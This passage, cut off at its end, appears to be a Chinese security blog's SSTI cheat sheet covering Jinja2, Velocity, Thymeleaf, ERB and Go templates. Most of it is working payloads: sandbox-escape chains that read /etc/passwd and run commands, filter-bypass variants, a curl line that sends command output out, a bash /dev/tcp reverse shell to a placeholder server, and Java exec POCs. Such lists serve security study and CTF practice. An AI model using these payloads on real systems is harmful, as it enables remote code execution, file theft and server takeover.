<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">发现`&#123;&#123; --- &#125;&#125;`其中的语句被执行了</span><br><span class="line"></span><br><span class="line">- 这是因为在flask中，渲染引擎Jinja2会将`&#123;&#123; --- &#125;&#125;`视为变量标识符，会将其包含的内容作为变量处理，从而包裹的语句被执行</span><br><span class="line">- 那么，在上一段代码中，如果我们传入的参数内容为`&#123;&#123; --- &#125;&#125;`包裹的代码，这些代码就会被执行</span><br><span class="line"></span><br><span class="line">两种代码的形式是，一种当字符串来渲染并且使用了`%(request.url)`，另一种规范使用index.html渲染文件。我们漏洞代码使用了`render_template_string`函数，而如果我们使用`render_template`函数，将变量传入进去，现在即使我们写成了request，我们可以在url里写自己想要的恶意代码`&#123;&#123;&#125;&#125;`你将会发现如下：</span><br></pre></td></tr></table></figure>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221203104033489.png" alt="image-20221203104033489"></p>
<p>在上述例子中，虽然已经可以实现任意代码执行，但由于模板本身的沙盒安全机制，某些语句虽然可以执行，却不会执行成功</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/38cb12c26e49b5678b9c682fc2f9548c.png" alt="img"></p>
<p>即使在服务器端将 os 包含进来，但是在渲染时仍然会出现这个错误，这就是因为沙盒机制严格地限制了程序的行为</p>
<p>沙箱逃逸的过程简单讲如下</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/eb3b14325cb6de4c69ef852c3affd370.png" alt="img"></p>
<p>由于在 jinja2 中是可以直接访问 python 的一些对象及其方法的，所以可以通过构造继承链来执行一些操作，比如文件读取，命令执行等：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">__dict__　　 ：保存类实例或对象实例的属性变量键值对字典</span><br><span class="line">__class__　　：返回一个实例所属的类</span><br><span class="line">__mro__　　  ：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。</span><br><span class="line">__bases__　　：以元组形式返回一个类直接所继承的类（可以理解为直接父类）__base__　　 ：和上面的bases大概相同，都是返回当前类所继承的类，即基类，区别是base返回单个，bases返回是元组</span><br><span class="line">// __base__和__mro__都是用来寻找基类的</span><br><span class="line">__subclasses__　　：以列表返回类的子类</span><br><span class="line">__init__　　 ：类的初始化方法</span><br><span class="line">__globals__　　   ：对包含函数全局变量的字典的引用__builtin__&amp;&amp;__builtins__　　：python中可以直接运行一些函数，例如int()，list()等等。　　　　　　　　　　　　　　　　　　这些函数可以在__builtin__可以查到。查看的方法是dir(__builtins__)　　　　　　　　　　　　　　　　　　在py3中__builtin__被换成了builtin　　　　　　　　　　　　　　　　　　1.在主模块main中，__builtins__是对内建模块__builtin__本身的引用，即__builtins__完全等价于__builtin__。　　　　　　　　　　　　　　　　　　2.非主模块main中，__builtins__仅是对__builtin__.__dict__的引用，而非__builtin__本身</span><br></pre></td></tr></table></figure>
<p>jinja2 使用 file 读取文件</p>
<p><strong>python3 已经移除了 file。所以利用 file 子类文件读取只能在 python2 中用。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% if c.__name__==&#x27;file&#x27; %&#125;</span><br><span class="line">&#123;&#123; c(&quot;/etc/passwd&quot;).readlines() &#125;&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<p>jinja2 命令执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># python2</span><br><span class="line">().__class__.__bases__[0].__subclasses__()[68].__init__.__globals__[&#x27;os&#x27;].system(&#x27;whoami&#x27;)</span><br><span class="line">().__class__.__base__.__subclasses__()[73].__init__.__globals__[&#x27;os&#x27;].system(&#x27;whoami&#x27;)</span><br><span class="line">().__class__.__mro__[1].__subclasses__()[68].__init__.__globals__[&#x27;os&#x27;].system(&#x27;whoami&#x27;)</span><br><span class="line">().__class__.__mro__[1].__subclasses__()[73].__init__.__globals__[&#x27;os&#x27;].system(&#x27;whoami&#x27;)</span><br><span class="line"></span><br><span class="line">#python3</span><br><span class="line">().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;)</span><br><span class="line">().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).system(&#x27;whoami&#x27;)&quot;)</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">获得基类</span><br><span class="line">#python2.7</span><br><span class="line">&#x27;&#x27;.__class__.__mro__[2]</span><br><span class="line">&#123;&#125;.__class__.__bases__[0]</span><br><span class="line">().__class__.__bases__[0]</span><br><span class="line">[].__class__.__bases__[0]</span><br><span class="line">request.__class__.__mro__[1]</span><br><span class="line">#python3.7</span><br><span class="line">&#x27;&#x27;.__。。。class__.__mro__[1]</span><br><span class="line">&#123;&#125;.__class__.__bases__[0]</span><br><span class="line">().__class__.__bases__[0]</span><br><span class="line">[].__class__.__bases__[0]</span><br><span class="line">request.__class__.__mro__[1]</span><br><span class="line"></span><br><span class="line">#python 2.7</span><br><span class="line">#文件操作</span><br><span class="line">#找到file类</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[40]</span><br><span class="line">#读文件</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[40](&#x27;/etc/passwd&#x27;).read()</span><br><span class="line">#写文件</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[40](&#x27;/tmp&#x27;).write(&#x27;test&#x27;)</span><br><span class="line"></span><br><span class="line">#命令执行</span><br><span class="line">#os执行</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache下有os类，可以直接执行命令：</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen(&#x27;id&#x27;).read()</span><br><span class="line">#eval,impoer等全局函数</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__下有eval，__import__等的全局函数，可以利用此来执行命令：</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.eval(&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;)</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()</span><br><span class="line">[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;id&#x27;).read()</span><br><span class="line"></span><br><span class="line">#python3.7</span><br><span class="line">#命令执行</span><br><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; c.__init__.__globals__[&#x27;__builtins__&#x27;].eval(&quot;__import__(&#x27;os&#x27;).popen(&#x27;id&#x27;).read()&quot;) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line">#文件操作</span><br><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;&#123;% if c.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; c.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;filename&#x27;, &#x27;r&#x27;).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line">#windows下的os命令</span><br><span class="line">&quot;&quot;.__class__.__bases__[0].__subclasses__()[118].__init__.__globals__[&#x27;popen&#x27;](&#x27;dir&#x27;).read()</span><br></pre></td></tr></table></figure>
<p><strong>过滤 [</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#getitem、pop</span><br><span class="line">&#x27;&#x27;.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)(&#x27;/etc/passwd&#x27;).read()</span><br><span class="line">&#x27;&#x27;.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(&#x27;ls&#x27;).read()</span><br></pre></td></tr></table></figure>
<p><strong>过滤引号</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">#chr函数</span><br><span class="line">&#123;% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %&#125;</span><br><span class="line">&#123;&#123;().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(chr(47)%2bchr(101)%2bchr(116)%2bchr(99)%2bchr(47)%2bchr(112)%2bchr(97)%2bchr(115)%2bchr(115)%2bchr(119)%2bchr(100)).read()&#125;&#125;#request对象</span><br><span class="line">&#123;&#123;().__class__.__bases__.__getitem__(0).__subclasses__().pop(40)(request.args.path).read() &#125;&#125;&amp;path=/etc/passwd</span><br><span class="line">#命令执行</span><br><span class="line">&#123;% set chr=().__class__.__bases__.__getitem__(0).__subclasses__()[59].__init__.__globals__.__builtins__.chr %&#125;</span><br><span class="line">&#123;&#123;().__class__.__bases__.__getitem__(0).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(chr(105)%2bchr(100)).read() &#125;&#125;</span><br><span class="line">&#123;&#123;().__class__.__bases__.__getitem__(0).__subclasses__().pop(59).__init__.func_globals.linecache.os.popen(request.args.cmd).read() &#125;&#125;&amp;cmd=id</span><br></pre></td></tr></table></figure>
<p><strong>过滤下划线</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;&#x27;&#x27;[request.args.class][request.args.mro][2][request.args.subclasses]()[40](&#x27;/etc/passwd&#x27;).read() &#125;&#125;&amp;class=__class__&amp;mro=__mro__&amp;subclasses=__subclasses__</span><br></pre></td></tr></table></figure>
<p><strong>过滤 join</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a))&#125;&#125;&amp;f=%s%sclass%s%s&amp;a=_</span><br></pre></td></tr></table></figure>
<p><strong>过滤花括号</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#用&#123;%%&#125;标记</span><br><span class="line">&#123;% if &#x27;&#x27;.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen(&#x27;curl http://127.0.0.1:7999/?i=`whoami`&#x27;).read()==&#x27;p&#x27; %&#125;1&#123;% endif %&#125;</span><br></pre></td></tr></table></figure>
<p><strong>RCE</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&#123;%set%20a,b,c,d,e,f,g,h,i%20=%20request.__class__.__mro__%&#125;&#123;&#123;i.__subclasses__().pop(40)(request.args.file,request.args.write).write(request.args.payload)&#125;&#125;&#123;&#123;config.from_pyfile(request.args.file)&#125;&#125;&amp;file=/tmp/foo.py&amp;write=w&amp;payload=print+1337</span><br><span class="line"></span><br><span class="line">&#123;%set%20a,b,c,d,e,f,g,h,i%20=%20request|attr((request.args.usc*2,request.args.class,request.args.usc*2)|join)|attr((request.args.usc*2,request.args.mro,request.args.usc*2)|join)%&#125;&#123;&#123;(i|attr((request.args.usc*2,request.args.subc,request.args.usc*2)|join)()).pop(40)(request.args.file,request.args.write).write(request.args.payload)&#125;&#125;&#123;&#123;config.from_pyfile(request.args.file)&#125;&#125;&amp;class=class&amp;mro=mro&amp;subc=subclasses&amp;usc=_&amp;file=/tmp/foo.py&amp;write=w&amp;payload=print+1337</span><br></pre></td></tr></table></figure>
<p><strong>利用示例：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&#123;% for c in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">&#123;% if c.__name__ == &#x27;catch_warnings&#x27; %&#125;</span><br><span class="line">  &#123;% for b in c.__init__.__globals__.values() %&#125;</span><br><span class="line">  &#123;% if b.__class__ == &#123;&#125;.__class__ %&#125;</span><br><span class="line">    &#123;% if &#x27;eval&#x27; in b.keys() %&#125;</span><br><span class="line">      &#123;&#123; b[&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;id&quot;).read()&#x27;) &#125;&#125;         //popen的参数就是要执行的命令</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">  &#123;% endif %&#125;</span><br><span class="line">  &#123;% endfor %&#125;</span><br><span class="line">&#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br></pre></td></tr></table></figure>
<p><span class="exturl" data-url="aHR0cHM6Ly94ei5hbGl5dW4uY29tL3QvMzY3OSN0b2MtMg==">flask 之 ssti 模版注入从零到入门 - 先知社区 (aliyun.com)</span></p>
<p>一些 SSTI 的利用方法</p>
<p><strong>XSS</strong></p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/183818089cbcfaebaa8530e26755baa6.png" alt="img"></p>
<p>以 GET 方式从 URL 处获取 code 参数的值，然后将它输出到页面 .</p>
<p>这段代码非常容易看出来存在安全隐患。后端没有对用户输入的内容进行过滤，就直接将它输出到页面 输入端是完全可控的。这就产生了代码域与数据域的混淆</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/d365f73c989235a7b2e272a714c28433.png" alt="img"></p>
<p><strong>反弹 shell</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#x27;&#x27;.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[&#x27;os&#x27;].popen(&#x27;bash -i &gt;&amp; /dev/tcp/你的服务器地址/端口 0&gt;&amp;1&#x27;).read()</span><br></pre></td></tr></table></figure>
<p>这个 Payload 不能直接放在 URL 中执行，因为  <code>&amp;</code>  的存在会导致 URL 解析出现错误 可以使用 BurpSuite 等工具构造数据包再发送</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/2a7321a2aee82c4f143e92ebf5bb70a9.png" alt="img"></p>
<ul>
<li>
<p><code>request.environ</code>  一个与服务器环境相关的对象字典。访问该字典可以拿到很多你期待的信息</p>
</li>
<li>
<p><code>config.items</code>  一个类字典的对象，包含了所有应用程序的配置值 在大多数情况下，它包含了比如数据库链接字符串，连接到第三方的凭证，SECRET_KEY 等敏感值</p>
</li>
</ul>
<h3 id="tornado"><a class="markdownIt-Anchor" href="#tornado">#</a> tornado</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tornado render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页，如果用户对render内容可控，不仅可以注入XSS代码，而且还可以通过&#123;&#123;&#125;&#125;进行传递变量和执行简单的表达式。</span><br></pre></td></tr></table></figure>
<h2 id="java"><a class="markdownIt-Anchor" href="#java">#</a> java</h2>
<h3 id="velocity"><a class="markdownIt-Anchor" href="#velocity">#</a> velocity</h3>
<p>Apache Velocity 是一个基于 Java 的模板引擎，它提供了一个模板语言去引用由 Java 代码定义的对象。Velocity 是 Apache 基金会旗下的一个开源软件项目，旨在确保 Web 应用程序在表示层和业务逻辑层之间的隔离（即 MVC 设计模式）。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">// 漏洞源码</span><br><span class="line">private static void velocity(String template)&#123;</span><br><span class="line">        Velocity.init();</span><br><span class="line"></span><br><span class="line">        VelocityContext context = new VelocityContext();</span><br><span class="line"></span><br><span class="line">        context.put(&quot;author&quot;, &quot;Elliot A.&quot;);</span><br><span class="line">        context.put(&quot;address&quot;, &quot;217 E Broadway&quot;);</span><br><span class="line">        context.put(&quot;phone&quot;, &quot;555-1337&quot;);</span><br><span class="line"></span><br><span class="line">        StringWriter swOut = new StringWriter();</span><br><span class="line">        // 使用Velocity</span><br><span class="line">        Velocity.evaluate(context, swOut, &quot;test&quot;, template);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>
<p><strong>POC</strong><br>
 <code>http://localhost:8080/ssti/velocity?template=%23set(%24e=%22e%22);%24e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22calc%22)</code></p>
<p><span class="exturl" data-url="aHR0cHM6Ly94ei5hbGl5dW4uY29tL3QvNzQ2NiN0b2MtMA==">白头搔更短，SSTI 惹人心！ - 先知社区 (aliyun.com)</span></p>
<h3 id="thymeleaf"><a class="markdownIt-Anchor" href="#thymeleaf">#</a> Thymeleaf</h3>
<p>Thymeleaf 是 SpringBoot 中的一个模版引擎，个人认为有点类似于 Python 中的 Jinja2，负责渲染前端页面。</p>
<p>Thymeleaf 中的表达式有好几种</p>
<ul>
<li>变量表达式：  <code>$&#123;...&#125;</code></li>
<li>选择变量表达式：  <code>*&#123;...&#125;</code></li>
<li>消息表达：  <code>#&#123;...&#125;</code></li>
<li>链接 URL 表达式：  <code>@&#123;...&#125;</code></li>
<li>片段表达式：  <code>~&#123;...&#125;</code></li>
</ul>
<p>片段表达式语法：</p>
<ol>
<li><strong>~{templatename::selector}</strong>，会在 <code>/WEB-INF/templates/</code>  目录下寻找名为 <code>templatename</code>  的模版中定义的 <code>fragment</code> ，如上面的 <code>~&#123;footer :: copy&#125;</code></li>
<li><strong>~{templatename}</strong>，引用整个 <code>templatename</code>  模版文件作为 <code>fragment</code></li>
<li><strong>~{::selector} 或～{this::selector}</strong>，引用来自同一模版文件名为 <code>selector</code>  的 <code>fragmnt</code></li>
</ol>
<p>其中 <code>selector</code>  可以是通过 <code>th:fragment</code>  定义的片段，也可以是类选择器、ID 选择器等。</p>
<p>当 <code>~&#123;&#125;</code>  片段表达式中出现 <code>::</code> ，则 <code>::</code>  后需要有值，也就是 <code>selector</code> 。</p>
<p>预处理</p>
<p>语法： <code>__$&#123;expression&#125;__</code></p>
<p>官方文档对其的解释：</p>
<blockquote>
<p>除了所有这些用于表达式处理的功能外，Thymeleaf 还具有<em>预处理</em>表达式的功能。</p>
<p><strong>预处理是在正常表达式之前完成的表达式的执行</strong>，允许修改最终将执行的表达式。</p>
<p>预处理的表达式与普通表达式完全一样，但被双下划线符号（如 <code>__$&#123;expression&#125;__</code> ）包围。</p>
</blockquote>
<p>个人感觉这是出现 SSTI 最关键的一个地方，预处理也可以解析执行表达式，也就是说找到一个可以控制预处理表达式的地方，让其解析执行我们的 payload 即可达到任意代码执行</p>
<p>最常见的 payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22id%22).getInputStream()).next()%7d__::.x</span><br></pre></td></tr></table></figure>
<p>通过 <code>__$&#123;&#125;__::.x</code>  构造表达式会由 Thymeleaf 去执行</p>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuY25ibG9ncy5jb20vQ29Mby9wLzE1NTA3NzM4Lmh0bWwjJUU2JUJDJThGJUU2JUI0JTlFJUU1JUE0JThEJUU3JThFJUIw">Java 安全之 Thymeleaf SSTI 分析 - Zh1z3ven - 博客园 (cnblogs.com)</span></p>
<h2 id="ruby"><a class="markdownIt-Anchor" href="#ruby">#</a> ruby</h2>
<h3 id="erb"><a class="markdownIt-Anchor" href="#erb">#</a> ERB</h3>
<p>ERB 的文档的语法如图所示</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/1651151342_626a91eef3e9ef68f1aa4.png!small" alt="image"></p>
<p>对主页面下进行 <code>/?message</code>  的参数探测，发现可以输入 <code>/?message</code> <br>
 再构造探测的 Payload，并将其转换为 url 编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%= 7*7 %</span><br></pre></td></tr></table></figure>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221203111704891.png" alt="image-20221203111704891"></p>
<p>回显 “49” 正是存在 SSTI 的证明，于是我们将 <code>7*7</code>  进行修改，改成任意命令注入的形式 system (“whoami”)`</p>
<p>ERB 引擎的安全文档指出可以列出所有目录，然后按如下方式读取任意文件。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;%= Dir.entries(&#x27;/&#x27;) %&gt;</span><br><span class="line">&lt;%= File.open(&#x27;/example/arbitrary-file&#x27;).read %&gt;</span><br></pre></td></tr></table></figure>
<p><span class="exturl" data-url="aHR0cHM6Ly93d3cuZnJlZWJ1Zi5jb20vYXJ0aWNsZXMvd2ViLzMzMTY1My5odG1s">从 0 到 1 完全掌握 SSTI - FreeBuf 网络安全行业门户</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl81NDUxNTgzNi9hcnRpY2xlL2RldGFpbHMvMTEzNzc4MjMz">(71 条消息) ssti 详解与例题以及绕过 payload 大全_HoAd’s blog 的博客 - CSDN 博客_ssti 绕过</span></p>
<p><span class="exturl" data-url="aHR0cHM6Ly9jbG91ZC50ZW5jZW50LmNvbS9kZXZlbG9wZXIvYXJ0aWNsZS8yMTMwNzg3">一文了解 SSTI 和所有常见 payload 以 flask 模板为例 - 腾讯云开发者社区 - 腾讯云 (tencent.com)</span></p>
<h2 id="go"><a class="markdownIt-Anchor" href="#go">#</a> go</h2>
<p>Go 提供了两个模板包。一个是  <code>text/template</code> ，另一个是 <code>html/template</code> 。text/template 对 XSS 或任何类型的 HTML 编码都没有保护，因此该模板并不适合构建 Web 应用程序，而 html/template 与 text/template 基本相同，但增加了 HTML 编码等安全保护，更加适用于构建 web 应用程序</p>
<p>template 之所以称作为模板的原因就是其由静态内容和动态内容所组成，可以根据动态内容的变化而生成不同的内容信息交由客户端</p>
<h3 id="texttemplate"><a class="markdownIt-Anchor" href="#texttemplate">#</a> text/template</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">package main</span><br><span class="line"></span><br><span class="line">import (</span><br><span class="line">    &quot;net/http&quot;</span><br><span class="line">    &quot;text/template&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">type User struct &#123;</span><br><span class="line">    ID       int</span><br><span class="line">    Name  string</span><br><span class="line">    Email    string</span><br><span class="line">    Password string</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func StringTpl2Exam(w http.ResponseWriter, r *http.Request) &#123;</span><br><span class="line">    user := &amp;User&#123;1,&quot;John&quot;, &quot;test@example.com&quot;, &quot;test123&quot;&#125;</span><br><span class="line">    r.ParseForm()</span><br><span class="line">    tpl := `&lt;h1&gt;Hi, &#123;&#123; .Name &#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; .Email &#125;&#125;`</span><br><span class="line">    data := map[string]string&#123;</span><br><span class="line">        &quot;Name&quot;:  user.Name,</span><br><span class="line">        &quot;Email&quot;: user.Email,</span><br><span class="line">    &#125;</span><br><span class="line">    html := template.Must(template.New(&quot;login&quot;).Parse(tpl))</span><br><span class="line">    html.Execute(w, data)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func main() &#123;</span><br><span class="line">    server := http.Server&#123;</span><br><span class="line">        Addr: &quot;127.0.0.1:8888&quot;,</span><br><span class="line">    &#125;</span><br><span class="line">    http.HandleFunc(&quot;/string&quot;, StringTpl2Exam)</span><br><span class="line">    server.ListenAndServe()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>struct 是定义了的一个结构体，在 go 中，我们是通过结构体来类比一个对象，因此他的字段就是一个对象的属性，在该实例中，我们所期待的输出内容为下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">模板内容 &lt;h1&gt;Hi, &#123;&#123; .Name &#125;&#125;&lt;/h1&gt;&lt;br&gt;Your Email is &#123;&#123; .Email &#125;&#125;</span><br><span class="line">期待输出 &lt;h1&gt;Hi, John&lt;/h1&gt;&lt;br&gt;Your Email is test@example.com</span><br></pre></td></tr></table></figure>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221204114031009.png" alt="image-20221204114031009"></p>
<p>可以看得出来，当传入参数可控时，就会经过动态内容生成不同的内容，而我们又可以知道，go 模板是提供字符串打印功能的，我们就有机会实现 xss</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">package main</span><br><span class="line"></span><br><span class="line">import (</span><br><span class="line">    &quot;net/http&quot;</span><br><span class="line">    &quot;text/template&quot;</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line">type User struct &#123;</span><br><span class="line">    ID       int</span><br><span class="line">    Name  string</span><br><span class="line">    Email    string</span><br><span class="line">    Password string</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">func StringTpl2Exam(w 